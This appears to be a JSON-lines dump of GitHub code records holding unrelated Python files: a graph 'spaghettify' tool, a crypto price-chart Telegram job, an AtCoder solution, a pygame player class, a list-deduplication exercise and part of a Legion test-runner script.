parser.add_argument(\"--nn\")\n parser.add_argument(\"--color_channels\")\n args = parser.parse_args()\n plot_cae_training(args.data_frame, args.nn, args.color_channels)\n","repo_name":"simulamet-host/video_analytics","sub_path":"e2evideo/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32371433686","text":"\"\"\"\nWe wish to test for 'spaghetti-like' models of some kind, which are models with high node degree, lots of edges and non-linear\nbehavior. One way to do so is to randomly add (directed) edges to a given model G according to some simple constraints.\nEdges are added until the avg. node degree of the model reaches some parameter rho, a measure of model \"density\".\n\nThe constraints on adding edges aren't yet well understood according to any real world data. For instance, one might\nconstrain that edges only be added within local structures, only link upstream nodes to downstream ones (prevent loops),\netc. \n\nIdeas for spaghetti generation:\n1) view actual process data to observe what spaghetti procs look like, statistically\n2) add edges under a random distribution, but give higher edge probability to high degree/centrality nodes, to prefer the 20% in the 80/20 rule about worker productivity\n\nInput: A process graph with a START and an END node. The START and END node will not have out/in edges added to them, respectively,\nwhich is a constraint we could evaluate later. But IIRC, some of the traversal algorithms I wrote expect START to have no input edges,\nand END to have no outputs, so if we axe the constraint, I'll need to recheck those algs. Think of these vertices as Source and Sink in other\ngraph algs.\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport igraph\nimport random\n\n\"\"\"\nReturns average node degree of a graph g.\nNote this function doesn't care about the distribution of node degrees, only the global mean.\n\"\"\"\ndef _getAverageDegree(g):\n\treturn float(len(g.es)) / float(len(g.vs))\n\n\"\"\"\nAny finite graph has a maximum average degree (rho), defined by the maximum number of \ndirected edges for a graph of size n.\n\nIn such cases, the maximum average degree is given by (#maximumEdges(#nodes) / #nodes).\nWhere maximumEdges(g) for a directed graph g is given by n * (n - 1).\n\"\"\"\ndef _getMaxRho(g):\n\tnumNodes = float(len(g.vs))\n\tmaxEdges = numNodes * (numNodes - 1.0)\n\treturn maxEdges / numNodes\n\n\"\"\"\nSimply adds edges between random nodes in the graph until some \ndensity parameter is reach.\n\n@inputpath: Path to a graphml file.\n@outputPath: Path to which the new graph will be saved.\n@rho: A density parameter (here, the average node degree of the graph)\n\"\"\"\ndef Spaghettify(inputPath, outputPath, rho):\n\tif inputPath == outputPath:\n\t\tprint(\"ERROR inputPath==outputPath in Spaghettify()\")\n\t\treturn\n\n\tprint(\"Executing spaghetti on graph \"+inputPath+\". Output will be written to \"+outputPath+\".\")\n\n\ti = 0\n\tg = igraph.Graph.Read(inputPath)\n\tdensity = _getAverageDegree(g)\n\tprint(\"Input graph density: \"+str(density))\n\tmaxRho = _getMaxRho(g)\n\t#show the input graph\n\tigraph.plot(g)\n\t\n\t#if density < rho, then no changes will be made to the input graph\n\tif density < rho:\n\t\t#this case is perfectly valid, but ought to print something to notify the tester anyway\n\t\tprint(\"WARN density < rho in Spaghettify. Input graph \"+inputPath+\" will not be modified.\")\n\t\n\t#until density parameter is reached\n\twhile density < rho and density < maxRho:\n\t\t#add a random edge\n\t\t_addRandomEdge(g)\n\t\tdensity = _getAverageDegree(g)\n\t\ti+=1\n\t\tif i > 1000:\n\t\t\tprint(\"WARNING i > 1000 in Spaghettify(), may be running forever...\")\n\t\t\n\tg.write_graphml(outputPath)\n\tprint(\"Output graph density: \"+str(density))\n\tigraph.plot(g)\n\t\n\"\"\"\nAdds an edge between two random nodes.\nThere are no constraints on the structural characteristics of the edge, the selected nodes are purely random and non-equal.\n\"\"\"\ndef _addRandomEdge(g):\n\tnewEdge = False\n\ti = 0\n\t\n\twhile not newEdge:\n\t\t#select two nodes uniformly at random\n\t\tn1 = g.vs[random.randint(0, len(g.vs)-1)].index\n\t\tn2 = g.vs[random.randint(0, len(g.vs)-1)].index\n\t\twhile n1 == n2: #reselect if nodes are the same\n\t\t\tn2 = g.vs[random.randint(0, len(g.vs)-1)].index\n\t\t#make sure we're not adding out edges from END or in-edges to START\n\t\tif g.vs[n1][\"name\"] != \"END\" and g.vs[n2][\"name\"] != \"START\":\n\t\t\t#check if n1->n2 is a new edge\n\t\t\tnewEdge = (n1,n2) not in [(e.source, e.target) for e in g.es]\n\t\t\tif newEdge: #edge is new, so just add it\n\t\t\t\tg.add_edge(n1,n2)\n\t\t\tprint(str(i))\n\t\ti += 1\n\t\tif i > 1000:\n\t\t\tprint(\"WARNING i > 1000 in Spaghettify._addRandomEdge(), may be running forever...\")\n\t\t\ndef usage():\n\tprint(\"Usage: python ./SpaghettifyModel.py -input=[graphml path] -output=[output graphml path] -rho=[average node degree param]\")\n\nif len(sys.argv) < 4:\n\tprint(\"ERROR incorrect number of parameters passed to SpaghettifyModel.py\")\n\tusage()\n\texit()\n\ninputModel = sys.argv[1].split(\"-input=\")[1]\noutputModel = sys.argv[2].split(\"-output=\")[1]\nrho = float(sys.argv[3].split(\"-rho=\")[1])\n\nSpaghettify(inputModel, outputModel, rho)\n","repo_name":"niceyeti/PMTools","sub_path":"Testing/SpaghettifyModel.py","file_name":"SpaghettifyModel.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30764901214","text":"from io import BytesIO\nfrom datetime import datetime\n\nfrom telegram.ext import CallbackContext\n\nfrom pycoingecko import CoinGeckoAPI\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import ConciseDateConverter\nimport matplotlib.units as munits\n\ncg = CoinGeckoAPI()\n\n# >> Setup Matplotlib\n\n# Use Agg which supports server side rendering\nmatplotlib.use('Agg')\n\n# Convert the units shown for datetimes\n# Stolen from: https://matplotlib.org/stable/gallery/ticks/date_concise_formatter.html\nformats = ['%y', '%b', '%d', '%H:%M', '%H:%M', '%S.%f']\nzero_formats = [''] + formats[:-1]\nzero_formats[3] = '%d-%b'\noffset_formats = ['', '%Y', '%b %Y', '%d %b %Y', '%d %b %Y', '%d %b %Y %H:%M']\nconverter = ConciseDateConverter(\n formats=formats,\n zero_formats=zero_formats,\n offset_formats=offset_formats\n)\nmunits.registry[datetime] = converter\n\n# >> The job\n\n\ndef daily(context: CallbackContext) -> None:\n chat_id = context.job.context[\"chat_id\"]\n chat = context.bot_data[\"chats\"][chat_id]\n\n # Extract the parameters\n id = chat[\"id\"]\n vs_currency = chat[\"vs_currency\"]\n amount = chat[\"amount\"]\n\n # Get history from coingecko\n history = cg.get_coin_market_chart_by_id(\n id=id,\n vs_currency=vs_currency,\n days=1\n )\n prices = history[\"prices\"]\n ts, price = zip(*prices)\n\n # Transform the series\n ts = [datetime.utcfromtimestamp(t/1000) for t in ts]\n price = [amount * p for p in price]\n\n # Make plot\n fig, ax = plt.subplots()\n ax.plot(ts, price)\n ax.set(ylabel='amount (£)')\n ax.grid()\n\n # Save as png\n plot_file = BytesIO()\n fig.savefig(plot_file, format='png')\n plot_file.seek(0)\n\n # Send to chat\n context.bot.send_photo(chat_id=chat_id, photo=plot_file)\n","repo_name":"Akeboshiwind/itrackcryptobot","sub_path":"itrackcryptobot/jobs/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27306717829","text":"S = input()\nend = len(S) - 1\n\n# 先頭のaの個数\ncount = 0\nfor i in range(0, len(S)):\n if S[i] != 'a':\n count = i + 1\n break\n\nfor i in reversed(range(0, len(S))):\n if S[i] != 'a':\n end = i\n break\ntarget = S[0:min(end+count, len(S))]\n\nif target == target[::-1]:\n print('Yes')\nelse:\n print('No')","repo_name":"yuuLab/algorithms","sub_path":"atcoder/abc-200-249/237/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20396966027","text":"'''\nUser controllable player\n'''\n\nimport os\nimport pygame\nfrom deploy import SiteDeployment\nfrom jackit.core import BLOCK_WIDTH, BLOCK_HEIGHT\nfrom jackit.core.patch import UserPatch\nfrom jackit.core.animation import SpriteStripAnimation\nfrom jackit.core import CustomEvent\nfrom jackit.core.actor import Actor\nfrom jackit.actors.enemy import Enemy\nfrom jackit.entities import CodeBlock, ExitBlock, DeathBlock,\\\n DecryptionKey, Coin\n\nclass Player(Actor):\n '''\n User controlled player\n '''\n\n def __init__(self, game_engine, controls, spawn_point=(0, 0)):\n run_jack = os.path.join(SiteDeployment.resource_path, \"sprites\", \"run_jack.bmp\")\n stand_jack = os.path.join(SiteDeployment.resource_path, \"sprites\", \"stand_jack.bmp\")\n jack_it = os.path.join(SiteDeployment.resource_path, \"sprites\", \"jack_it.bmp\")\n jack_off = os.path.join(SiteDeployment.resource_path, \"sprites\", \"jack_off.bmp\")\n\n self.stand_animation = SpriteStripAnimation(\n stand_jack, (0, 0, 19, BLOCK_HEIGHT), 1, -1, False,\n int(game_engine.config.framerate / 7)\n )\n self.run_animation = SpriteStripAnimation(\n run_jack, (0, 0, 19, BLOCK_HEIGHT), 2, -1, True,\n int(game_engine.config.framerate / 7)\n )\n self.run_left_animation = SpriteStripAnimation(\n run_jack, (0, 0, 19, BLOCK_HEIGHT), 2, -1, True,\n int(game_engine.config.framerate / 7), x_mirror=True\n )\n\n self.jackin_it = SpriteStripAnimation(\n jack_it, (0, 0, BLOCK_WIDTH, BLOCK_HEIGHT), 10, -1, False,\n int(game_engine.config.framerate / 7)\n )\n\n self.jackin_off = SpriteStripAnimation(\n jack_off, (0, 0, BLOCK_WIDTH, BLOCK_HEIGHT), 8, -1, False,\n int(game_engine.config.framerate / 7)\n )\n\n super(Player, self).__init__(\n game_engine, 19, BLOCK_HEIGHT, spawn_point[0],\n spawn_point[1], animation=self.stand_animation\n )\n\n self.controls = controls\n self.use_patch = True # Use the UserPatch for player stats and player\n\n # Current level points\n self.level_points = 0\n\n # List of items the player has\n self.items = []\n\n # List of stored code routines (so they don't have to do the code blocks_hit\n # every time)\n self.stored_code = []\n\n # True if the player is alive otherwise false\n self.alive = True\n\n # True if the player cannot be killed\n self.invincible = False\n\n # Whether the animations for jackin in or jackin off are running\n self.is_jackin_in = False\n self.is_jackin_off = False\n\n def update(self):\n super(Player, self).update()\n\n if self.is_jackin_in and self.animation.done():\n self.is_jackin_in = False\n if self.is_jackin_off and self.animation.done():\n self.is_jackin_off = False\n\n def stop(self):\n if self.is_jackin_in or self.is_jackin_off:\n return\n\n if self.horizontal_movement_action != self.stop:\n self.animation = self.stand_animation.iter()\n super(Player, self).stop()\n\n def go_left(self):\n if self.is_jackin_in or self.is_jackin_off:\n return\n\n if self.horizontal_movement_action != self.go_left:\n self.animation = self.run_left_animation.iter()\n super(Player, self).go_left()\n\n def go_right(self):\n if self.is_jackin_in or self.is_jackin_off:\n return\n\n if self.horizontal_movement_action != self.go_right:\n self.animation = self.run_animation.iter()\n super(Player, self).go_right()\n\n def has_key(self):\n '''\n Does the player have the decryption key?\n '''\n return any(isinstance(x, DecryptionKey) for x in self.items)\n\n def collide(self, change_x, change_y, sprite):\n '''\n Called on each collision\n '''\n collideable = super(Player, self).collide(change_x, change_y, sprite)\n\n if isinstance(sprite, Coin):\n self.collides_with.remove(sprite) # So we don't accidently grab it twice\n self.level_points += sprite.points\n self.game_engine.total_points += sprite.points\n pygame.event.post(pygame.event.Event(CustomEvent.KILL_SPRITE, {\"sprite\":sprite}))\n elif isinstance(sprite, DecryptionKey):\n self.collides_with.remove(sprite) # So we don't accidently grab it twice\n self.items.append(sprite)\n pygame.event.post(pygame.event.Event(CustomEvent.KILL_SPRITE, {\"sprite\":sprite}))\n for block in self.game_engine.current_level.code_blocks:\n block.locked = False\n elif isinstance(sprite, ExitBlock):\n self.items.clear()\n self.level_points = 0\n pygame.event.post(pygame.event.Event(CustomEvent.NEXT_LEVEL))\n elif isinstance(sprite, Enemy) or isinstance(sprite, DeathBlock):\n self.kill()\n\n return collideable\n\n def reset(self):\n '''\n Reset the player\n '''\n super(Player, self).reset()\n self.alive = True\n self.invincible = False\n\n def kill(self):\n '''\n Kill the player\n '''\n if not self.alive or self.invincible:\n return\n\n self.items.clear()\n self.items = []\n self.game_engine.total_points -= self.level_points\n self.level_points = 0\n\n self.alive = False\n super(Player, self).kill()\n\n def is_on_collideable(self):\n '''\n The rare chance that we land perfectly on an enemy and miss the call to collide\n '''\n ret = super(Player, self).is_on_collideable()\n if ret:\n for block in self.frame_cache[\"is_on_collideable\"]:\n if isinstance(block, Enemy) or isinstance(block, DeathBlock):\n pygame.event.post(pygame.event.Event(CustomEvent.KILL_SPRITE, {\"sprite\":self}))\n break\n return ret\n\n def collide_with(self, sprite):\n '''\n Some other sprite collided into us (we didn't collide into it)\n Happens when the other sprite is moving and this sprite is not\n '''\n if isinstance(sprite, Enemy):\n self.kill()\n\n def is_on_code_block(self):\n '''\n True if the Player is on a code block\n Uses frame cache to improve performance\n for subsequent calls\n '''\n if self.frame_cache.get(\"is_on_code_block\", None) is not None:\n return True\n\n if not self.is_on_interactable():\n return False\n\n for interactable in self.frame_cache[\"is_on_interactable\"]:\n if isinstance(interactable, CodeBlock):\n self.frame_cache[\"is_on_code_block\"] = interactable\n return True # Level design should only allow player to be on one code block\n # at a time. If not, too bad, I'm ignoring any others.\n\n return False\n\n def is_on_interactable(self):\n '''\n True if Player is on an interactable entity\n uses frame cache to ensure subsequent calls\n are faster\n '''\n\n # Speed up calls to this method if used more than once per frame\n if self.frame_cache.get(\"is_on_interactable\", None) is not None:\n return True\n\n blocks_hit = self.spritecollide(\n self.game_engine.current_level.interactable_blocks,\n 0, 0,\n trigger_cb=False,\n only_collideable=False\n )\n\n self.frame_cache[\"is_on_interactable\"] = []\n for block in blocks_hit:\n if block.is_interactable():\n self.frame_cache[\"is_on_interactable\"].append(block)\n\n if len(self.frame_cache[\"is_on_interactable\"]) == 0:\n self.frame_cache[\"is_on_interactable\"] = None\n return False\n\n return True\n\n def handle_event(self, event, keys):\n '''\n Handle player events (like controls and stuff)\n @param event - Current event\n @param keys - List of keys currently pressed by key ID\n '''\n if event.type == pygame.KEYUP:\n if event.key == self.controls.left and not keys[self.controls.right]:\n self.stop()\n elif event.key == self.controls.right and not keys[self.controls.left]:\n self.stop()\n elif event.key == self.controls.jump:\n self.stop_jumping()\n elif event.type == pygame.KEYDOWN:\n if event.key == self.controls.reset_code:\n print(\"Resetting code block\")\n for block in self.game_engine.current_level.code_blocks:\n block.restore() # Put the initial challenge text back\n UserPatch.unpatch()\n elif event.key == self.controls.kill_self:\n print(\"Killing self!\")\n self.game_engine.hud.display_hint(\"You just killed yourself with 'K'. Worth it?\", 2)\n self.kill()\n return False\n elif event.key == self.controls.left:\n self.go_left()\n elif event.key == self.controls.right:\n self.go_right()\n elif event.key == self.controls.jump:\n self.jump()\n elif event.key == self.controls.interact and self.is_on_code_block():\n if self.frame_cache[\"is_on_code_block\"].is_locked() and not self.has_key():\n return True # Continue processing events\n\n print(self.frame_cache[\"is_on_code_block\"].is_locked())\n print(self.has_key())\n\n # Stop the player and put them over the interactable object\n # and make them invincible\n self.hard_stop()\n self.rect.left =\\\n (self.frame_cache[\"is_on_code_block\"].rect.left - (self.rect.width / 2))\n\n self.rect.bottom = self.frame_cache[\"is_on_code_block\"].rect.bottom\n\n # Interact with the object\n self.frame_cache[\"is_on_code_block\"].interact()\n\n return True # Continue processing events\n","repo_name":"vix597/jackit","sub_path":"jackit/actors/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71915470169","text":"\"\"\" removes duplicate elements from a given list\n return new list without the duplication\n\nevery number will be checked, and see if it exists in the no_duplicate list,\nif doesn't exist, will be added to the list,\nif exists already, will be discarded\nwill print the list with every number occurring only once \n(hence duplicate removed)\n\"\"\"\nnums = [1, 3, 67, 89, 1, 3, 45, 66]\nprint('Given list: ', nums)\n\ndef remove_dup(nums):\n no_duplicate = [] # every number stored here will occur once\n\n for i in nums:\n if i not in no_duplicate: # if the current count_item is not in the list, USE not in INSTEAD OF !=\n no_duplicate.append(i) # add the count_item to the list\n return no_duplicate # will output thr new list with no duplicates\n\n\nprint('After removing the duplicate numbers: ',remove_dup(nums))\n\n\n\n# using SET method\nnums1 = [1, 3, 67, 89, 1, 3, 45, 66]\nprint('Given list: ', nums1)\n\nnums1_set = set(nums1) # making a SET\nprint('Unique SET of numbers: ', nums1_set) # prints the SET (no duplicates)\nnums1_set_to_list = list(nums1_set) # converting from SET to list\nprint('Unique LIST of numbers: ',nums1_set_to_list) # prints the list with no duplicates/unique numbers\n","repo_name":"oboniA/Data-Structure-and-Algorithms","sub_path":"LIST/Exercises/Removing techniques/removes dupliocate.py","file_name":"removes dupliocate.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34337215917","text":"from __future__ import print_function\nimport argparse, datetime, glob, json, multiprocessing, os, platform, shlex, shutil, subprocess, sys, traceback, tempfile\nimport signal\nfrom pathlib import Path\n\nmake_exe = os.environ.get('MAKE', 'make')\n\n# Find physical core count of the machine.\nif platform.system() == 'Linux':\n lines = subprocess.check_output(['lscpu', '--parse=core']).decode('utf-8')\n physical_cores = len(set(line for line in lines.strip().split('\\n')\n if not line.startswith('#')))\nelif platform.system() == 'Darwin':\n physical_cores = int(\n subprocess.check_output(['sysctl', '-n', 'hw.physicalcpu']).decode('utf-8'))\nelif platform.system() == 'FreeBSD':\n physical_cores = int(\n subprocess.check_output(['sysctl', '-n', 'hw.ncpu']).decode('utf-8'))\n make_exe = os.environ.get('MAKE', 'gmake') # default needs to be GNU make\nelse:\n raise Exception('Unknown platform: %s' % platform.system())\n\n# Choose a reasonable number of application cores given the\n# available physical cores.\napp_cores = max(physical_cores - 2, 1)\n\nlegion_cxx_tests = [\n # Tutorial\n ['tutorial/00_hello_world/hello_world', []],\n ['tutorial/01_tasks_and_futures/tasks_and_futures', []],\n ['tutorial/02_index_tasks/index_tasks', []],\n ['tutorial/03_global_vars/global_vars', []],\n ['tutorial/04_logical_regions/logical_regions', []],\n ['tutorial/05_physical_regions/physical_regions', []],\n ['tutorial/06_privileges/privileges', []],\n ['tutorial/07_partitioning/partitioning', []],\n ['tutorial/08_multiple_partitions/multiple_partitions', []],\n ['tutorial/09_custom_mapper/custom_mapper', []],\n\n # Examples\n ['examples/circuit/circuit', []],\n ['examples/dynamic_registration/dynamic_registration', []],\n ['examples/ghost/ghost', ['-ll:cpu', '4']],\n ['examples/ghost_pull/ghost_pull', ['-ll:cpu', '4']],\n ['examples/realm_saxpy/realm_saxpy', []],\n ['examples/realm_stencil/realm_stencil', ['-ll:cpu', '4']],\n ['examples/spmd_cgsolver/spmd_cgsolver', ['-ll:cpu', '4', '-perproc']],\n ['examples/virtual_map/virtual_map', []],\n ['examples/attach_2darray_c_fortran_layout/attach_2darray', []],\n ['examples/attach_array_daxpy/attach_array_daxpy', []],\n ['examples/attach_index_space/index_space_attach', []],\n ['examples/predication/predication', []],\n ['examples/layout_constraints/transpose', []],\n ['examples/padded_instances/padded_instances', []],\n ['examples/inline_tasks/inline_tasks', []],\n ['examples/local_function_tasks/local_function_tasks', []],\n ['examples/provenance/provenance', []],\n ['examples/tiling/tiling', []],\n ['examples/machine_config/machine_config', []],\n # Comment this test out until it works everywhere\n #['examples/implicit_top_task/implicit_top_task', []],\n\n # Tests\n ['test/rendering/rendering', ['-i', '2', '-n', '64', '-ll:cpu', '4']],\n ['test/legion_stl/test_stl', []],\n\n # Tutorial/realm\n ['tutorial/realm/hello_world/realm_hello_world', []],\n ['tutorial/realm/machine_model/realm_machine_model', []],\n ['tutorial/realm/events/realm_events', []],\n ['tutorial/realm/region_instances/realm_region_instances', []],\n ['tutorial/realm/deferred_allocation/realm_deferred_allocation', []],\n ['tutorial/realm/index_space_ops/realm_index_space_ops', []],\n ['tutorial/realm/index_space_copy_fill/realm_index_space_copy_fill', []],\n ['tutorial/realm/reductions/realm_reductions', []],\n ['tutorial/realm/barrier/realm_barrier', []],\n ['tutorial/realm/subgraph/realm_subgraph', []],\n ['tutorial/realm/reservation/realm_reservation', []],\n ['tutorial/realm/completion_queue/realm_completion_queue', []],\n ['tutorial/realm/profiling/realm_profiling', []],\n]\n\nif 'USE_CUDA' in os.environ and os.environ['USE_CUDA'] == 1:\n legion_cxx_tests += [\n ['tutorial/realm/cuda_interop/realm_cuda_interop', []],\n ]\n\nlegion_cxx_prof_tests = [\n ['examples/provenance/provenance', []],\n ['test/gather_perf/gather_perf', ['-m', '1']],\n ['test/gather_perf/gather_perf', ['-m', '2']],\n ['test/gather_perf/gather_perf', ['-m', '3']],\n ['test/gather_perf/gather_perf', ['-m', '4']],\n ['test/gather_perf/gather_perf', ['-m', '5']],\n ['test/gather_perf/gather_perf', ['-m', '6']],\n ['test/gather_perf/gather_perf', ['-m', '7']],\n]\n\nlegion_fortran_tests = [\n ['tutorial/fortran/00_hello_world/hello_world_fortran', []],\n ['tutorial/fortran/01_tasks_and_futures/tasks_and_futures_fortran', []],\n ['tutorial/fortran/02_index_tasks/index_tasks_fortran', []],\n ['tutorial/fortran/03_physical_regions/physical_regions_fortran', []],\n ['tutorial/fortran/04_privileges_accessor/privileges_accessor_fortran', []],\n ['tutorial/fortran/05_privileges_raw_ptr/privileges_raw_ptr_fortran', []],\n ['tutorial/fortran/06_partitioning/partitioning_fortran', []],\n ['tutorial/fortran/07_partitioning_fortran_task/partitioning_fortran_task_fortran', []],\n ['tutorial/fortran/08_multiple_partitions/multiple_partitions_fortran', []],\n ['tutorial/fortran/09_region_2d/region_2d_fortran', []],\n ['tutorial/fortran/10_attach_array/attach_array_fortran', []],\n]\n\nif platform.system() != 'Darwin':\n legion_cxx_tests += [\n # FIXME: Fails non-deterministically on Mac OS: https://github.com/StanfordLegion/legion/issues/213\n ['test/attach_file_mini/attach_file_mini', []],\n ]\n\nlegion_network_cxx_tests = [\n # Examples\n ['examples/mpi_interop/mpi_interop', []],\n\n # Tests\n ['test/bug954/bug954', ['-ll:rsize', '1024']],\n]\n\nlegion_openmp_cxx_tests = [\n # Examples\n ['examples/omp_saxpy/omp_saxpy', ['-ll:ocpu', '1']],\n]\n\nlegion_kokkos_cxx_tests = [\n # Examples\n ['examples/kokkos_saxpy/kokkos_saxpy', []],\n]\n\nlegion_python_cxx_tests = [\n # Bindings\n ['bindings/python/legion_python', ['examples/domain.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/domain_point.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/domain_transform.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/future.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/hello.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/import.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/index_launch.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/ispace.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/method.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/must_epoch.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_field.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_image.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_image_range.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_preimage.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_preimage_range.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_restriction.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/reduction.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/region.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/region_fields.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/return_region.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/single_launch.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/struct.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/trace.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/tunable.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/types.py', '-ll:py', '1', '-ll:cpu', '0']],\n\n ['bindings/python/legion_python', ['tests/fail/privileges.py', '-ll:py', '1', '-ll:cpu', '0']],\n\n ['bindings/python/legion_python', ['tests/pass/copy.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/empty_region.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/print_once.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/privileges.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/no_access.py', '-ll:py', '1', '-ll:cpu', '0']],\n\n # Tests for Package Import\n ['bindings/python/legion_python', ['-m', 'tests.pass.test_package1.a.b.c', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['-m', 'tests.pass.test_package2.a.b.c', '-ll:py', '1', '-ll:cpu', '0']],\n\n # Examples\n ['examples/python_interop/python_interop', ['-ll:py', '1']],\n\n # Tests\n ['test/python_bindings/python_bindings', ['-ll:py', '1', '-ll:cpu', '0']],\n]\n\nlegion_hdf_cxx_tests = [\n # Tests\n ['test/hdf_attach_subregion_parallel/hdf_attach_subregion_parallel', ['-ll:cpu', '4']],\n]\n\nif platform.system() != 'Darwin':\n legion_hdf_cxx_tests += [\n # FIXME: Fails non-deterministically on Mac OS: https://github.com/StanfordLegion/legion/issues/213\n ['examples/attach_file/attach_file', ['-h', 'data.h5', '-d', '/path/to/data']],\n ]\n\ndef get_legion_cxx_perf_tests(nodes, cores_per_node):\n return [\n # Circuit: Heavy Compute\n ['examples/circuit/circuit',\n ['-l', '10', '-p', str(cores_per_node * nodes), '-npp', '2500', '-wpp', '10000',\n '-ll:csize', '8192', '-ll:cpu', str(cores_per_node)]],\n\n # Circuit: Light Compute\n ['examples/circuit/circuit',\n ['-l', '10', '-p', '100', '-npp', '2', '-wpp', '4', '-ll:cpu', '2']],\n ]\n\ndef get_regent_perf_tests(nodes, cores_per_node):\n return [\n # Circuit: Heavy Compute\n ['language/examples/circuit_sparse.rg',\n ['-l', '10', '-p', str(nodes * cores_per_node), '-npp', '2500', '-wpp', '10000',\n '-ll:csize', '8192', '-ll:cpu', str(cores_per_node), '-fflow-spmd-shardsize', str(cores_per_node)]],\n\n # Circuit: Light Compute\n ['language/examples/circuit_sparse.rg',\n ['-l', '10', '-p', '100', '-npp', '2', '-wpp', '4', '-ll:cpu', '2',\n '-fflow-spmd-shardsize', '2']],\n\n # PENNANT: Heavy Compute\n ['language/examples/pennant_fast.rg',\n ['pennant.tests/sedovbig3x30/sedovbig.pnt',\n '-seq_init', '0', '-par_init', '1', '-print_ts', '1', '-prune', '5',\n '-npieces', str(nodes * cores_per_node), '-numpcx', '1', '-numpcy', str(nodes * cores_per_node),\n '-ll:csize', '8192', '-ll:cpu', str(cores_per_node), '-fflow-spmd-shardsize', str(cores_per_node),\n '-fvectorize-unsafe', '1']],\n ]\n\nclass TestTimeoutException(Exception):\n pass\n\ndef sigalrm_handler(signum, frame):\n raise TestTimeoutException\n\ndef cmd(command, env=None, cwd=None, timelimit=None):\n print(' '.join(command))\n sys.stdout.flush() # python 2 doesn't have flush option in print\n if timelimit:\n child = subprocess.Popen(command, env=env, cwd=cwd)\n signal.signal(signal.SIGALRM, sigalrm_handler)\n signal.alarm(timelimit)\n try:\n ret = child.wait()\n signal.alarm(0) # disable alarm\n signal.signal(signal.SIGALRM, signal.SIG_DFL)\n if ret:\n raise subprocess.CalledProcessError(ret, command)\n return ret\n except TestTimeoutException:\n child.kill()\n raise # re-raise\n else:\n return subprocess.check_call(command, env=env, cwd=cwd)\n\ndef run_test_regent(launcher, root_dir, tmp_dir, bin_dir, env, thread_count):\n cmd([sys.executable, os.path.join(root_dir, 'language/travis.py')], env=env)\n\ndef run_cxx(tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit):\n prev_built_dir = None\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n if bin_dir:\n test_path = os.path.join(bin_dir, os.path.basename(test_file))\n else:\n test_path = os.path.join(root_dir, test_file)\n # build if this is in a new directory\n if test_dir != prev_built_dir:\n # and clean up the previous directory to keep disk usage down\n if prev_built_dir:\n cmd(['find', prev_built_dir , '-type', 'f', '(', '-name', '*.a', '-o', '-name', os.path.basename(test_file), ')', '-exec', 'rm', '-v', '{}', ';'])\n cmd([make_exe, '-C', test_dir, '-j', str(thread_count)], env=env)\n prev_built_dir = test_dir\n cmd(launcher + [test_path] + flags + test_flags, env=env, cwd=test_dir, timelimit=timelimit)\n if prev_built_dir:\n cmd(['find', prev_built_dir , '-type', 'f', '(', '-name', '*.a', '-o', '-name', 